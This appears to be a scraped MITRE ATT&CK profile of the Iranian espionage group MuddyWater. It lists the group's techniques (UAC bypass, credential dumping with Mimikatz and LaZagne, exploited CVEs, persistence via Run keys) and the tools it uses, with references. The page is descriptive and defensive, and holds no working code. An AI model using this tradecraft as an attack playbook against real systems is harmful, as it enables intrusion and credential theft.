Group description: MuddyWater
quality 2/10 · low quality
0 net
Tags
MuddyWater, Earth Vetala, MERCURY, Static Kitten, Seedworm, TEMP.Zagros, Mango Sandstorm, TA450, Group G0069 | MITRE ATT&CK®
ATT&CK v19 will be released April 28th! Check out this blog post for information on the planned deprecation of Enterprise's Defense Evasion tactic in the upcoming release.
Home
Groups
MuddyWater
MuddyWater
MuddyWater is a cyber espionage group assessed to be a subordinate element within Iran's Ministry of Intelligence and Security (MOIS). [1] Since at least 2017, MuddyWater has targeted a range of government and private organizations across sectors, including telecommunications, local government, defense, and oil and natural gas organizations, in the Middle East, Asia, Africa, Europe, and North America. [2] [3] [4] [5] [6] [7] [8]
ID: G0069
ⓘ
Associated Groups : Earth Vetala, MERCURY, Static Kitten, Seedworm, TEMP.Zagros, Mango Sandstorm, TA450
Contributors : Ozer Sarilar, @ozersarilar, STM; Daniyal Naeem, BT Security; Marco Pedrinazzi, @pedrinazziM
Version : 6.0
Created: 18 April 2018
Last Modified: 22 October 2025
Version Permalink
Live Version
Associated Group Descriptions
Name
Description
Earth Vetala
[9]
MERCURY
[10]
Static Kitten
[10] [9]
Seedworm
[3] [10] [9]
TEMP.Zagros
[11] [10] [9]
Mango Sandstorm
[12]
TA450
[13]
ATT&CK ® Navigator Layers
Enterprise Layer
download
view
Techniques Used
Domain
ID
Name
Use
Enterprise
T1548
.002
Abuse Elevation Control Mechanism : Bypass User Account Control
MuddyWater uses various techniques to bypass UAC. [4]
Enterprise
T1087
.002
Account Discovery : Domain Account
MuddyWater has used cmd.exe net user /domain to enumerate domain users. [9]
Enterprise
T1583
.006
Acquire Infrastructure : Web Services
MuddyWater has used file sharing services including OneHub, Sync, and TeraBox to distribute tools. [10] [9] [13]
Enterprise
T1071
.001
Application Layer Protocol : Web Protocols
MuddyWater has used HTTP for C2 communications. [5] [9]
Enterprise
T1560
.001
Archive Collected Data : Archive via Utility
MuddyWater has used the native Windows cabinet creation tool, makecab.exe, likely to compress stolen data to be uploaded. [3]
Enterprise
T1547
.001
Boot or Logon Autostart Execution : Registry Run Keys / Startup Folder
MuddyWater has added Registry Run key KCU\Software\Microsoft\Windows\CurrentVersion\Run\SystemTextEncoding to establish persistence. [11] [14] [15] [6] [9] [8]
Enterprise
T1059
.001
Command and Scripting Interpreter : PowerShell
MuddyWater has used PowerShell for execution. [11] [16] [14] [3] [4] [15] [6] [9] [7] [8]
.003
Command and Scripting Interpreter : Windows Command Shell
MuddyWater has used a custom tool for creating reverse shells. [3]
.005
Command and Scripting Interpreter : Visual Basic
MuddyWater has used VBScript files to execute its POWERSTATS payload, as well as macros. [11] [16] [14] [3] [4] [5] [6] [9] [8]
.006
Command and Scripting Interpreter : Python
MuddyWater has developed tools in Python including Out1 . [9]
.007
Command and Scripting Interpreter : JavaScript
MuddyWater has used JavaScript files to execute its POWERSTATS payload. [4] [11] [7]
Enterprise
T1555
Credentials from Password Stores
MuddyWater has performed credential dumping with LaZagne and other tools, including by dumping passwords saved in victim email. [2] [3] [9]
.003
Credentials from Web Browsers
MuddyWater has run tools including Browser64 to steal passwords saved in victim web browsers. [3] [9]
Enterprise
T1132
.001
Data Encoding : Standard Encoding
MuddyWater has used tools to encode C2 communications including Base64 encoding. [5] [9]
Enterprise
T1074
.001
Data Staged : Local Data Staging
MuddyWater has stored a decoy PDF file within a victim's %temp% folder. [8]
Enterprise
T1140
Deobfuscate/Decode Files or Information
MuddyWater has decoded base64-encoded PowerShell, JavaScript, and VBScript. [11] [16] [4] [8]
Enterprise
T1573
.001
Encrypted Channel : Symmetric Cryptography
MuddyWater has used AES to encrypt C2 responses. [8]
Enterprise
T1041
Exfiltration Over C2 Channel
MuddyWater has used C2 infrastructure to receive exfiltrated data. [6]
Enterprise
T1190
Exploit Public-Facing Application
MuddyWater has exploited the Microsoft Exchange memory corruption vulnerability (CVE-2020-0688). [7]
Enterprise
T1203
Exploitation for Client Execution
MuddyWater has exploited the Office vulnerability CVE-2017-0199 for execution. [5]
Enterprise
T1210
Exploitation of Remote Services
MuddyWater has exploited the Microsoft Netlogon vulnerability (CVE-2020-1472). [7]
Enterprise
T1083
File and Directory Discovery
MuddyWater has used malware that checked if the ProgramData folder had folders or files with the keywords "Kasper," "Panda," or "ESET." [14]
Enterprise
T1574
.001
Hijack Execution Flow : DLL
MuddyWater maintains persistence on victim networks through side-loading dlls to trick legitimate programs into running malware. [7]
Enterprise
T1562
.001
Impair Defenses : Disable or Modify Tools
MuddyWater can disable the system's local proxy settings. [9]
Enterprise
T1105
Ingress Tool Transfer
MuddyWater has used malware that can upload additional files to the victim’s machine. [14] [4] [6] [9]
Enterprise
T1559
.001
Inter-Process Communication : Component Object Model
MuddyWater has used malware that has the capability to execute malicious code via COM, DCOM, and Outlook. [14] [5] [7]
.002
Inter-Process Communication : Dynamic Data Exchange
MuddyWater has used malware that can execute PowerShell scripts via DDE. [14]
Enterprise
T1036
.005
Masquerading : Match Legitimate Resource Name or Location
MuddyWater has disguised malicious executables and used filenames and Registry key names associated with Windows Defender. [11] [15] [10]
Enterprise
T1104
Multi-Stage Channels
MuddyWater has used one C2 to obtain enumeration scripts and monitor web logs, but a different C2 to send data back. [15]
Enterprise
T1027
.003
Obfuscated Files or Information : Steganography
MuddyWater has stored obfuscated JavaScript code in an image file named temp.jpg. [4]
.004
Obfuscated Files or Information : Compile After Delivery
MuddyWater has used the .NET csc.exe tool to compile executables from downloaded C# code. [4]
.010
Obfuscated Files or Information : Command Obfuscation
MuddyWater has used Daniel Bohannon’s Invoke-Obfuscation framework and obfuscated PowerShell scripts. [2] [17] The group has also used other obfuscation methods, including Base64 obfuscation of VBScripts and PowerShell commands. [2] [11] [14] [15] [5] [9] [8]
Enterprise
T1588
.002
Obtain Capabilities : Tool
MuddyWater has used legitimate tools ConnectWise , RemoteUtilities , and SimpleHelp to gain access to the target environment. [10] [18]
Enterprise
T1137
.001
Office Application Startup : Office Template Macros
MuddyWater has used a Word Template, Normal.dotm, for persistence. [6]
Enterprise
T1003
.001
OS Credential Dumping : LSASS Memory
MuddyWater has performed credential dumping with Mimikatz and procdump64.exe. [2] [3] [9]
.004
OS Credential Dumping : LSA Secrets
MuddyWater has performed credential dumping with LaZagne . [2] [3]
.005
OS Credential Dumping : Cached Domain Credentials
MuddyWater has performed credential dumping with LaZagne . [2] [3]
Enterprise
T1566
.001
Phishing : Spearphishing Attachment
MuddyWater has compromised third parties and used compromised accounts to send spearphishing emails with targeted attachments to recipients. [2] [11] [14] [5] [10] [9] [7] [13]
.002
Phishing : Spearphishing Link
MuddyWater has sent targeted spearphishing e-mails with malicious links. [10] [9] [13]
Enterprise
T1057
Process Discovery
MuddyWater has used malware to obtain a list of running processes on the system. [14] [5]
Enterprise
T1090
.002
Proxy : External Proxy
MuddyWater has controlled POWERSTATS from behind a proxy network to obfuscate the C2 location. [3] MuddyWater has used a series of compromised websites that victims connected to randomly to relay information to command and control (C2). [6] [9]
Enterprise
T1219
Remote Access Tools
MuddyWater has used legitimate applications ScreenConnect, AteraAgent and SimpleHelp to manage systems remotely and move laterally. [9] [10] [13] [18]
Enterprise
T1053
.005
Scheduled Task/Job : Scheduled Task
MuddyWater has used scheduled tasks to establish persistence. [6]
Enterprise
T1113
Screen Capture
MuddyWater has used malware that can capture screenshots of the victim’s machine. [14]
Enterprise
T1518
Software Discovery
MuddyWater has used a PowerShell backdoor to check for Skype connectivity on the target machine. [9]
.001
Security Software Discovery
MuddyWater has used malware to check running processes against a hard-coded list of security tools often used by malware researchers. [14]
Enterprise
T1218
.003
System Binary Proxy Execution : CMSTP
MuddyWater has used CMSTP.exe and a malicious INF to execute its POWERSTATS payload. [11]
.005
System Binary Proxy Execution : Mshta
MuddyWater has used mshta.exe to execute its POWERSTATS payload and to pass a PowerShell one-liner for execution. [11] [14]
.011
System Binary Proxy Execution : Rundll32
MuddyWater has used malware that leveraged rundll32.exe in a Registry Run key to execute a .dll. [14]
Enterprise
T1082
System Information Discovery
MuddyWater has used malware that can collect the victim’s OS version and machine name. [14] [15] [6] [9] [8]
Enterprise
T1016
System Network Configuration Discovery
MuddyWater has used malware to collect the victim’s IP address and domain name. [14]
Enterprise
T1049
System Network Connections Discovery
MuddyWater has used a PowerShell backdoor to check for Skype connections on the target machine. [9]
Enterprise
T1033
System Owner/User Discovery
MuddyWater has used malware that can collect the victim’s username. [14] [9]
Enterprise
T1552
.001
Unsecured Credentials : Credentials In Files
MuddyWater has run a tool that steals passwords saved in victim email. [3]
Enterprise
T1204
.001
User Execution : Malicious Link
MuddyWater has distributed URLs in phishing e-mails that link to lure documents. [10] [9] [13]
.002
User Execution : Malicious File
MuddyWater has attempted to get users to open malicious PDF attachment and to enable macros and launch malicious Microsoft Word documents delivered via spearphishing emails. [2] [11] [14] [15] [5] [6] [10] [9] [7] [8] [13]
Enterprise
T1102
.002
Web Service : Bidirectional Communication
MuddyWater has used web services including OneHub to distribute remote access tools. [10]
Enterprise
T1047
Windows Management Instrumentation
MuddyWater has used malware that leveraged WMI for execution and querying host information. [14] [4] [15] [7]
Software
ID
Name
References
Techniques
S0591
ConnectWise
[10] [9]
Command and Scripting Interpreter : PowerShell , Screen Capture , Video Capture
S0488
CrackMapExec
[19] [3]
Account Discovery : Domain Account , Brute Force : Password Spraying , Brute Force : Password Guessing , Brute Force , Command and Scripting Interpreter : PowerShell , File and Directory Discovery , Local Storage Discovery , Modify Registry , Network Share Discovery , OS Credential Dumping : Security Account Manager , OS Credential Dumping : NTDS , OS Credential Dumping : LSA Secrets , Password Policy Discovery , Permission Groups Discovery : Domain Groups , Remote System Discovery , Scheduled Task/Job : At , System Network Configuration Discovery , System Network Connections Discovery , Use Alternate Authentication Material : Pass the Hash , Windows Management Instrumentation
S1243
DCHSpy
[20]
Application Layer Protocol , Archive Collected Data , Audio Capture , Data from Local System , Location Tracking , Masquerading : Match Legitimate Name or Location , Protected User Data : Contact List , Protected User Data : SMS Messages , Protected User Data : Accounts , Protected User Data : Call Log , Stored Application Data , Video Capture
S0363
Empire
[19]
Abuse Elevation Control Mechanism : Bypass User Account Control , Access Token Manipulation : SID-History Injection , Access Token Manipulation , Access Token Manipulation : Create Process with Token , Account Discovery : Domain Account , Account Discovery : Local Account , Adversary-in-the-Middle : LLMNR/NBT-NS Poisoning and SMB Relay , Application Layer Protocol : Web Protocols , Archive Collected Data , Automated Collection , Automated Exfiltration , Boot or Logon Autostart Execution : Security Support Provider , Boot or Logon Autostart Execution : Registry Run Keys / Startup Folder , Boot or Logon Autostart Execution : Shortcut Modification , Browser Information Discovery , Clipboard Data , Command and Scripting Interpreter : PowerShell , Command and Scripting Interpreter : Windows Command Shell , Command and Scripting Interpreter , Create Account : Local Account , Create Account : Domain Account , Create or Modify System Process : Windows Service , Credentials from Password Stores : Keychain , Credentials from Password Stores : Credentials from Web Browsers , Domain or Tenant Policy Modification : Group Policy Modification , Domain Trust Discovery , Email Collection : Local Email Collection , Encrypted Channel : Asymmetric Cryptography , Event Triggered Execution : Accessibility Features , Exfiltration Over C2 Channel , Exfiltration Over Web Service : Exfiltration to Code Repository , Exfiltration Over Web Service : Exfiltration to Cloud Storage , Exploitation for Privilege Escalation , Exploitation of Remote Services , File and Directory Discovery , Group Policy Discovery , Hijack Execution Flow : Path Interception by Unquoted Path , Hijack Execution Flow : Path Interception by Search Order Hijacking , Hijack Execution Flow : Path Interception by PATH Environment Variable , Hijack Execution Flow : Dylib Hijacking , Hijack Execution Flow : DLL , Indicator Removal : Timestomp , Ingress Tool Transfer , Input Capture : Keylogging , Input Capture : Credential API Hooking , Native API , Network Service Discovery , Network Share Discovery , Network Sniffing , Obfuscated Files or Information : Command Obfuscation , OS Credential Dumping : LSASS Memory , Process Discovery , Process Injection , Remote Services : Distributed Component Object Model , Remote Services : SSH , Scheduled Task/Job : Scheduled Task , Screen Capture , Software Discovery : Security Software Discovery , Steal or Forge Kerberos Tickets : Kerberoasting , Steal or Forge Kerberos Tickets : Golden Ticket , Steal or Forge Kerberos Tickets : Silver Ticket , System Information Discovery , System Network Configuration Discovery , System Network Connections Discovery , System Owner/User Discovery , System Services : Service Execution , Trusted Developer Utilities Proxy Execution : MSBuild , Unsecured Credentials : Credentials In Files , Unsecured Credentials : Private Keys , Use Alternate Authentication Material : Pass the Hash , Video Capture , Web Service : Bidirectional Communication , Windows Management Instrumentation
S0250
Koadic
[6] [19]
Abuse Elevation Control Mechanism : Bypass User Account Control , Application Layer Protocol : Web Protocols , Boot or Logon Autostart Execution : Registry Run Keys / Startup Folder , Clipboard Data , Command and Scripting Interpreter : Visual Basic , Command and Scripting Interpreter : PowerShell , Command and Scripting Interpreter : Windows Command Shell , Data from Local System , Encrypted Channel : Asymmetric Cryptography , File and Directory Discovery , Hide Artifacts : Hidden Window , Ingress Tool Transfer , Network Service Discovery , Network Share Discovery , OS Credential Dumping : Security Account Manager , OS Credential Dumping : NTDS , Process Injection : Dynamic-link Library Injection , Remote Services : Remote Desktop Protocol , Scheduled Task/Job : Scheduled Task , System Binary Proxy Execution : Mshta , System Binary Proxy Execution : Regsvr32 , System Binary Proxy Execution : Rundll32 , System Information Discovery , System Network Configuration Discovery , System Owner/User Discovery , System Services : Service Execution , Windows Management Instrumentation
S0349
LaZagne
[3] [19]
Credentials from Password Stores : Windows Credential Manager , Credentials from Password Stores : Credentials from Web Browsers , Credentials from Password Stores , Credentials from Password Stores : Keychain , OS Credential Dumping : LSA Secrets , OS Credential Dumping : /etc/passwd and /etc/shadow , OS Credential Dumping : LSASS Memory , OS Credential Dumping : Cached Domain Credentials , OS Credential Dumping : Proc Filesystem , Unsecured Credentials : Credentials In Files
S0002
Mimikatz
[2] [19]
Access Token Manipulation : SID-History Injection , Account Manipulation , Boot or Logon Autostart Execution : Security Support Provider , Credentials from Password Stores , Credentials from Password Stores : Credentials from Web Browsers , Credentials from Password Stores : Windows Credential Manager , OS Credential Dumping : DCSync , OS Credential Dumping : Security Account Manager , OS Credential Dumping : LSASS Memory , OS Credential Dumping : LSA Secrets , Rogue Domain Controller , Steal or Forge Authentication Certificates , Steal or Forge Kerberos Tickets : Golden Ticket , Steal or Forge Kerberos Tickets : Silver Ticket , Unsecured Credentials : Private Keys , Use Alternate Authentication Material : Pass the Hash , Use Alternate Authentication Material : Pass the Ticket
S1047
Mori
[7]
Application Layer Protocol : Web Protocols , Application Layer Protocol : DNS , Data Encoding : Standard Encoding , Data Obfuscation : Junk Data , Deobfuscate/Decode Files or Information , Indicator Removal : File Deletion , Modify Registry , Query Registry , System Binary Proxy Execution : Regsvr32
S0594
Out1
[9]
Application Layer Protocol : Web Protocols , Command and Scripting Interpreter : Windows Command Shell , Data from Local System , Email Collection : Local Email Collection , Obfuscated Files or Information
S0194
PowerSploit
[19]
Access Token Manipulation , Account Discovery : Local Account , Audio Capture , Boot or Logon Autostart Execution : Registry Run Keys / Startup Folder , Boot or Logon Autostart Execution : Security Support Provider , Command and Scripting Interpreter : PowerShell , Create or Modify System Process : Windows Service , Credentials from Password Stores : Windows Credential Manager , Data from Local System , Domain Trust Discovery , Hijack Execution Flow : Path Interception by PATH Environment Variable , Hijack Execution Flow : Path Interception by Unquoted Path , Hijack Execution Flow : DLL , Hijack Execution Flow : Path Interception by Search Order Hijacking , Input Capture : Keylogging , Obfuscated Files or Information : Indicator Removal from Tools , Obfuscated Files or Information : Command Obfuscation , OS Credential Dumping : LSASS Memory , Process Discovery , Process Injection : Dynamic-link Library Injection , Query Registry , Reflective Code Loading , Scheduled Task/Job : Scheduled Task , Screen Capture , Steal or Forge Kerberos Tickets : Kerberoasting , Unsecured Credentials : Credentials in Registry , Unsecured Credentials : Group Policy Preferences , Windows Management Instrumentation
S0223
POWERSTATS
[2] [11] [4] [3] [5]
Account Discovery : Local Account , Command and Scripting Interpreter : PowerShell , Command and Scripting Interpreter : Visual Basic , Command and Scripting Interpreter : JavaScript , Data Encoding : Standard Encoding , Data from Local System , Deobfuscate/Decode Files or Information , Encrypted Channel : Asymmetric Cryptography , Impair Defenses : Disable or Modify Tools , Indicator Removal : File Deletion , Ingress Tool Transfer , Inter-Process Communication : Component Object Model , Inter-Process Communication : Dynamic Data Exchange , Masquerading : Masquerade Task or Service , Obfuscated Files or Information : Command Obfuscation , Obfuscated Files or Information : Junk Code Insertion , Process Discovery , Proxy : External Proxy , Scheduled Task/Job : Scheduled Task , Scheduled Transfer , Screen Capture , Software Discovery : Security Software Discovery , System Binary Proxy Execution : Mshta , System Information Discovery , System Network Configuration Discovery , System Owner/User Discovery , Windows Management Instrumentation
S1046
PowGoop
[7]
Application Layer Protocol : Web Protocols , Command and Scripting Interpreter : PowerShell , Data Encoding : Non-Standard Encoding , Deobfuscate/Decode Files or Information , Encrypted Channel , Hijack Execution Flow : DLL , Masquerading , Masquerading : Match Legitimate Resource Name or Location
S0592
RemoteUtilities
[9]
File and Directory Discovery , Ingress Tool Transfer , Screen Capture , System Binary Proxy Execution : Msiexec
S0450
SHARPSTATS
[19]
Command and Scripting Interpreter : PowerShell , Ingress Tool Transfer , Obfuscated Files or Information : Command Obfuscation , System Information Discovery , System Network Configuration Discovery , System Owner/User Discovery , System Time Discovery
S1035
Small Sieve
[7] [21]
Application Layer Protocol : Web Protocols , Boot or Logon Autostart Execution : Registry Run Keys / Startup Folder , Command and Scripting Interpreter : Windows Command Shell , Command and Scripting Interpreter : Python , Data Encoding : Non-Standard Encoding , Encrypted Channel : Asymmetric Cryptography , Execution Guardrails , Ingress Tool Transfer , Masquerading : Match Legitimate Resource Name or Location , Obfuscated Files or Information , System Network Configuration Discovery , System Owner/User Discovery , Web Service : Bidirectional Communication
S1037
STARWHALE
[7]
Application Layer Protocol : Web Protocols , Boot or Logon Autostart Execution : Registry Run Keys / Startup Folder , Command and Scripting Interpreter : Visual Basic , Command and Scripting Interpreter : Windows Command Shell , Create or Modify System Process : Windows Service , Data Encoding : Standard Encoding , Data from Local System , Data Staged : Local Data Staging , Exfiltration Over C2 Channel , Obfuscated Files or Information : Encrypted/Encoded File , System Information Discovery , System Network Configuration Discovery , System Owner/User Discovery , User Execution : Malicious File
References
Cyber National Mission Force. (2022, January 12). Iranian intel cyber suite of malware uses open source tools. Retrieved September 30, 2022.
Lancaster, T.. (2017, November 14). Muddying the Water: Targeted Attacks in the Middle East. Retrieved March 15, 2018.
Symantec DeepSight Adversary Intelligence Team. (2018, December 10). Seedworm: Group Compromises Government Agencies, Oil & Gas, NGOs, Telecoms, and IT Firms. Retrieved December 14, 2018.
ClearSky Cyber Security. (2018, November). MuddyWater Operations in Lebanon and Oman: Using an Israeli compromised domain for a two-stage campaign. Retrieved November 29, 2018.
ClearSky. (2019, June). Iranian APT group ‘MuddyWater’ Adds Exploits to Their Arsenal. Retrieved May 14, 2020.
Reaqta. (2017, November 22). A dive into MuddyWater APT targeting Middle-East. Retrieved May 18, 2020.
FBI, CISA, CNMF, NCSC-UK. (2022, February 24). Iranian Government-Sponsored Actors Conduct Cyber Operations Against Global Government and Commercial Networks. Retrieved September 27, 2022.
Malhortra, A and Ventura, V. (2022, January 31). Iranian APT MuddyWater targets Turkish users via malicious PDFs, executables. Retrieved June 22, 2022.
Peretz, A. and Theck, E. (2021, March 5). Earth Vetala – MuddyWater Continues to Target Organizations in the Middle East. Retrieved March 18, 2021.
Mele, G. et al. (2021, February 10). Probable Iranian Cyber Actors, Static Kitten, Conducting Cyberespionage Campaign Targeting UAE and Kuwait Government Agencies. Retrieved March 17, 2021.
Singh, S. et al.. (2018, March 13). Iranian Threat Group Updates Tactics, Techniques and Procedures in Spear Phishing Campaign. Retrieved April 11, 2018.
Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.
Miller, J. et al. (2024, March 21). Security Brief: TA450 Uses Embedded Links in PDF Attachments in Latest Campaign. Retrieved March 27, 2024.
Kaspersky Lab's Global Research & Analysis Team. (2018, October 10). MuddyWater expands operations. Retrieved November 2, 2018.
Adamitis, D. et al. (2019, May 20). Recent MuddyWater-associated BlackWater campaign shows signs of new anti-detection techniques. Retrieved June 5, 2019.
Villanueva, M., Co, M. (2018, June 14). Another Potential MuddyWater Campaign uses Powershell-based PRB-Backdoor. Retrieved July 3, 2018.
Bohannon, D.. (2017, March 13). Invoke-Obfuscation - PowerShell Obfuscator. Retrieved June 18, 2017.
Rostovcev, N. (2023, April 18). SimpleHarm: Tracking MuddyWater’s infrastructure. Retrieved July 11, 2024.
Lunghi, D. and Horejsi, J.. (2019, June 10). MuddyWater Resurfaces, Uses Multi-Stage Backdoor POWERSTATS V3 and New Post-Exploitation Tools. Retrieved May 14, 2020.
Albrecht, J., Islamoglu, A. (2025, July 21). Lookout Discovers Iranian APT MuddyWater Leveraging DCHSpy During Israel-Iran Conflict . Retrieved September 19, 2025.
NCSC GCHQ. (2022, January 27). Small Sieve Malware Analysis Report. Retrieved August 22, 2022.
×
load more results